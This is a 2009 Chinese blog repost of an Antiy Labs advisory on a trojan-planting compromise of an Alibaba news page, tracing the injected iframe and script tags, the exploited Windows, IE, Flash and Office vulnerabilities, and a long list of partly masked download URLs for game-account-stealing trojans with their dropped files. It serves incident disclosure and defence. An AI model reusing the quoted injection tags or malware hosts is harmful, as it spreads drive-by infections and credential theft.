注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

苗得雨:网事争锋

我们在攻击邪恶和黑暗时要毫不留情,但是也要腾出时间来为善行鼓掌,为光明喝彩!

 
 
 

日志

 
 

安天监控到阿里巴巴网站挂马  

2009-08-11 18:08:22|  分类: 网络安全专栏 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

    2009年8月11日上午10时,安天实验室发现,阿里巴巴网站商业资讯页面(http://info.china.alibaba.com/news/detail/v5003013-d1000221193.html),此页面被黑客植入恶意代码,如果用户访问该页面时,系统会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。由于阿里巴巴引用了外部链接(http://www.zhichang.cn/stest1/content_qingjing.asp?id=34),间接的导致挂马事件的产生。

阿里巴巴网站商业资讯挂马页面:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋<frame src="http://info.china***.alibaba.com/news/left/v5003013-d1000221193.html?iframe_delete=true" name="mainFrame" scrolling="NO">

http://info.china***.alibaba.com/news/left/v5003013-d1000221193.html问题框架代码:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋<IFRAME id="intro" name="left" frameBorder=0 scrolling=auto src="http://www.zhichang***.cn/stest1/content_qingjing.asp?id=34" width="100%" height="100%"></IFRAME>

http://www.zhichang***.cn/stest1/content_qingjing.asp?id=34问题框架代码:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋<script src=http://3b3***.org/c.js></script>

http://3b3.org/c.js集成网马框架:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋两条恶意链接最终的挂马页面内容相同,这里只跟踪其中一条链接

<iframe src=http://59-34-198-113.3322***.org/aa/a100.htm width=0 height=0></iframe>

http://59-34-198-113.3322***.org/aa/a100.htm问题框架代码:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋<iframe src="index.htm" width=111 height=0 border=0></iframe>

http://59-34-198-113.3322***.org/aa/index.htm问题框架代码:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋<iframe src=pp.htm width=100 height=0></iframe>

http://59-34-198-113.3322***.org/aa/pp.htm问题框架代码:

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋

 

该挂马网页利用以下漏洞进行传播:
MS06-014漏洞
MS09-032漏洞
MS09-002漏洞
Adobe Flash Player SWF文件漏洞
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit
漏洞信息与描述:
Microsoft Data Access Components (MDAC) 功能中的漏洞可能允许执行代码(MS06-014)
受影响系统:
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows 98
Microsoft Windows 98 Second Edition (SE)、
Microsoft Windows Millennium Edition (ME)
Microsoft Windows 2000 Service Pack 4
描述和解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/ms06-014.mspx
Microsoft Internet Explorer未初始化的内存损坏漏洞(MS09-002)
受影响版本:
Microsoft Internet Explorer 7.0
解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx
MS09-002 IE7 漏洞原理分析:
链接:http://www.antiy.com/cn/security/2009/s090220_002.htm
Microsoft DirectShow MPEG2溢出漏洞(MS09-032)
受影响系统:
Windows XP Service Pack 2 和 Windows XP Service Pack 3
Windows XP Professional x64 Edition Service Pack 2
Windows Server 2003 Service Pack 2
Windows Server 2003 x64 Edition Service Pack 2
Windows Server 2003 SP2(用于基于 Itanium 的系统)
解决方案:
Microsoft已经发布了安全公告和相应补丁:
链接:http://www.microsoft.com/china/technet/security/bulletin/MS09-032.mspx
Adobe Flash Player SWF文件漏洞
受影响版本:
Adobe Flash Player 9.0.115.0以及以前的版本
解决方案:
Adobe已经发布了安全公告和相应补丁:
链接:http://www.adobe.com/support/security/bulletins/apsb08-11.html
OWC10.Spreadsheet msDataSourceObject Method Stack Overflow Exploit
受影响版本:
Microsoft Office Web Components 10
临时解决方法:
为clsid: 0002E551-0000-0000-C000-000000000046设置kill-bit。
解决方案:
目前微软官方还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本
http://www.microsoft.com/china/technet/security/
当用户访问挂马网站,系统会自动下载病毒文件:
1、网页木马直接下载的病毒文件:
http://kapa8080***.com/svchost.exe 病毒名:Trojan/Win32.Mudrop.cmf[Dropper]
病毒描述:木马释放器,释放木马连接http://mm520mm.com/aa1dfh.txt网络下载病毒文件
衍生文件:
c:\Documents and Settings\a\Local Settings\Temp\IXP000.TMP\own.exe
c:\Documents and Settings\a\Local Settings\Temp\IXP000.TMP\svchost.exe
2、下载者木马读取下载列表地址:
http://mm520mm***.com/aaldfh.txt
3、由下载者木马下载的其他病毒文件:
http://1.1234llll***.com/good/aa1.exe 病毒名:Trojan/Win32.Magania.buah[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\emHnPuBAaF7XjuXBbdxSg.dll
c:\WINDOWS\system32\dfc8ac3ed7da.dll
c:\WINDOWS\system32\comres.dll
c:\WINDOWS\Fonts\WD7eC3pJvgmYQYNwrVP.Ttf

http://1.1234llll***.com/good/aa2.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:梦幻西游online盗号木马
衍生文件:
c:\WINDOWS\system32\Qh6xX7VN48sVPnK.dll
c:\WINDOWS\Fonts\CcKKcpwJmND4.Ttf

http://1.1234llll***.com/good/aa3.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Q9q2MHJ3uTBErM7wc.dll
c:\WINDOWS\Fonts\GD9xUjmZ8vHS5Vj.Ttf

http://1.1234llll***.com/good/aa4.exe 病毒名:Trojan/Win32.Agent.ayqa[Dropper]
病毒描述:大话西游 ii游戏盗号木马
衍生文件:
c:\WINDOWS\system32\MV3ArsBMAPjxBcRuu.dll
c:\WINDOWS\Fonts\jFwbmsUefPJv9F.Ttf

http://1.1234llll***.com/good/aa5.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\CSzZ3gVtf.Ttf
c:\WINDOWS\Fonts\zEfE48cw9EmcFaR.fon

http://1.1234llll***.com/good/aa6.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:魔兽世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\xg4hAPNygs29.dll
c:\WINDOWS\Fonts\K7XaTBMWp8TPrYgw.Ttf

http://1.1234llll***.com/good/aa7.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\w7uds3zyayg9.dll
c:\WINDOWS\Fonts\gfq7ymgpkp.Ttf

http://1.1234llll***.com/good/aa8.exe 病毒名:Trojan/Win32.Magania.bmid[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\WcCtgJ4zcxHF.dll
c:\WINDOWS\Fonts\CSzZ3gVtf.Ttf

http://1.1234llll***.com/good/aa9.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\skcfujQ5EDN.dll
c:\WINDOWS\Fonts\YywxhF7TSnkktrJw.Ttf

http://1.1234llll***.com/good/aa10.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\e38H8kRkk.Ttf
c:\WINDOWS\Fonts\NPPVWvYEyCe8H.fon

http://2.1234llll***.com/good/aa11.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\RCZbVbjCY6wYszD3.Ttf
c:\WINDOWS\Fonts\A97CRaCB.fon

http://2.1234llll***.com/good/aa12.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\704C3595.dll
c:\WINDOWS\Fonts\S8a8cnEuaydPJGg8.Ttf

http://2.1234llll***.com/good/aa13.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\SCEVFJRCmaB7.dll
c:\WINDOWS\Fonts\G8qZ5hBX7H.Ttf

http://2.1234llll***.com/good/aa14.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\BMsg6pdMD4ht.dll
c:\WINDOWS\Fonts\MhaUKGazkr3fZZKp.Ttf

http://2.1234llll***.com/good/aa15.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:诛仙游戏盗号木马
衍生文件:
c:\WINDOWS\system32\rfpz9wwyy2np.dll
c:\WINDOWS\Fonts\vztr58qstaca8y8j.Ttf

http://2.1234llll***.com/good/aa16.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\a4rxQxCvNBMNnpqs.dll
c:\WINDOWS\Fonts\Rfs3DRdsUfkma5.Ttf

http://2.1234llll***.com/good/aa17.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\h5yUmHGVdqVr.dll
c:\WINDOWS\Fonts\jcPMKqwuVC7J.Ttf

http://2.1234llll***.com/good/aa18.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\z5WRXqHagksJxWt.dll
c:\WINDOWS\Fonts\sUfa6DfmrK.Ttf

http://2.1234llll***.com/good/aa19.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:封神榜网络版游戏盗号木马
衍生文件:
c:\WINDOWS\system32\76B9BA7A.dll
c:\WINDOWS\Fonts\pDuuqr4BgFn65AeW.Ttf

http://2.1234llll***.com/good/aa20.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:大话西游3游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ndxq9awMc.dll
c:\WINDOWS\Fonts\CRp3uYCmcxMp3qQn9.Ttf

http://3.1234llll***.com/good/aa21.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\08223B03.dll
c:\WINDOWS\Fonts\eCgMhGRkP dutd0.Ttf

http://3.1234llll***.com/good/aa22.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:完美世界游戏盗号木马
衍生文件:
c:\WINDOWS\system32\122B901E.dll
c:\WINDOWS\Fonts\cFDPmh3MDPjcHMPd.Ttf

http://3.1234llll***.com/good/aa23.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:武林外传游戏盗号木马
衍生文件:
c:\WINDOWS\system32\dhDhwS7fFW.dll
c:\WINDOWS\Fonts\cD9KArZZUHxCqnyM.Ttf

http://3.1234llll***.com/good/aa24.exe 病毒名:Trojan/Win32.Buzus.bsst
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ zmfimp.dll
c:\Documents and Settings\a\Local Settings\Temp\dsad11.exe
c:\Documents and Settings\a\Local Settings\Temp\1.tmp

http://3.1234llll***.com/good/aa25.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\wdGSVBqAs3Xk.dll
c:\WINDOWS\Fonts\KzAMjdYaws6f395.Ttf

http://3.1234llll***.com/good/aa26.exe 病毒名:Trojan/Win32.Magania.biht[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\EMPPpCCSA8GtjURjn.dll
c:\WINDOWS\Fonts\ENwKMykghsrCQMPyvP6Uu4.Ttf

http://3.1234llll***.com/good/aa27.exe 病毒名:Trojan/Win32.Magania.bful[GameThief]
病毒描述:传奇外传游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\du3Q2JXbHYGxcSAe.Ttf
c:\WINDOWS\Fonts\tY5UFS434YYd.fon

http://3.1234llll***.com/good/aa28.exe 病毒名:Trojan/Win32.Magania.bfwc[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\GU6f5sW42mdc.dll
c:\WINDOWS\Fonts\avJ9SdDwMd9Qzt.Ttf

http://3.1234llll***.com/good/aa29.exe 病毒名:Trojan/Win32.Magania.bfsy[GameThief]
病毒描述:华夏2游戏盗号木马
衍生文件:
c:\WINDOWS\Fonts\Qq3qg7RGSp9raxWW.Ttf
c:\WINDOWS\Fonts\uXUsF2RrQy.fon

http://3.1234llll***.com/good/aa30.exe 链接失效

http://4.1234llll***.com/good/aa31.exe 病毒名:Trojan/Win32.Magania.bkii[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ZZZCz7d8yS9vy.dll
c:\WINDOWS\Fonts\VnX3UKKVWKSSVqZW.Ttf

http://4.1234llll***.com/good/aa32.exe 病毒名:Trojan/Win32.Magania.bfws[GameThief]
病毒描述:梦幻西游online盗号木马
衍生文件:
c:\WINDOWS\Fonts\CcKKcpwJmND4.Ttf
c:\WINDOWS\Fonts\jUxfqJDwmfQEHcy2.fon

http://4.1234llll***.com/good/aa33.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\cRsAQd4hw.dll
c:\WINDOWS\Fonts\Wt2KuAXTXmrRUbAq.Ttf

http://4.1234llll***.com/good/aa34.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Y4npJWJNr.dll
c:\WINDOWS\Fonts\GanWM9z57VChEAfV.Ttf

http://4.1234llll***.com/good/aa35.exe 病毒名:Trojan/Win32.Magania.awce[GameThief]
病毒描述:QQ钓鱼木马,伪装QQ系统发布中奖信息,添加HOSTS文件劫持域名及映像劫持多款安全软件
衍生文件:
c:\WINDOWS\system32\drivers\etc\hosts

http://4.1234llll***.com/good/aa36.exe 病毒名:Trojan/Win32.OnLineGames.bmnb[GameThief]
病毒描述:QQ盗号木马
衍生文件:
c:\Documents and Settings\a\Application Data\D6.dll
c:\Documents and Settings\a\Application Data\D7.tmp
c:\Documents and Settings\a\Application Data\I2.bak

http://4.1234llll***.com/good/aa37.exe 病毒名:Trojan/Win32.Magania.bfrp[GameThief]
病毒描述:游戏盗号木马
衍生文件:
c:\WINDOWS\system32\ed78ab9.dll
c:\WINDOWS\Fonts\yGMHUAj5Npydj8FZ.Ttf

http://4.1234llll***.com/good/aa38.exe 病毒名:Trojan/Win32.Magania.bfrm[GameThief]
病毒描述:LUNA(露娜)online游戏盗号木马
衍生文件:
c:\WINDOWS\system32\Iansme.dat
c:\WINDOWS\system32\Ybams.dll
c:\WINDOWS\system32\myInsDll.exe
c:\WINDOWS\system32\sfc32.dll
c:\WINDOWS\system32\Cassicen.dll
c:\WINDOWS\system32\lpk.dll

http://4.1234llll***.com/good/1.exe 病毒名:Trojan/Win32.VB.czs[Clicker]
病毒描述:恶意捆绑插件,运行后连接网络点击广告
衍生文件:无

安天反病毒工程师建议:
1、使用安天防线2009或锐甲可以有效防范此挂马网页。

安天监控到阿里巴巴网站挂马 - 苗得雨 - 苗得雨:网事争锋

2、用安天防线2009可以查杀此挂马网页下载的病毒文件。
3、请及时更新安天防线2009,以确保您的计算机安全,防止计算机病毒入侵。如未安装安天防线请点击此处(http://www.antiyfx.com/download.htm)免费下载最新版安天防线2009来防止病毒入侵。

  评论这张
 
阅读(200)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017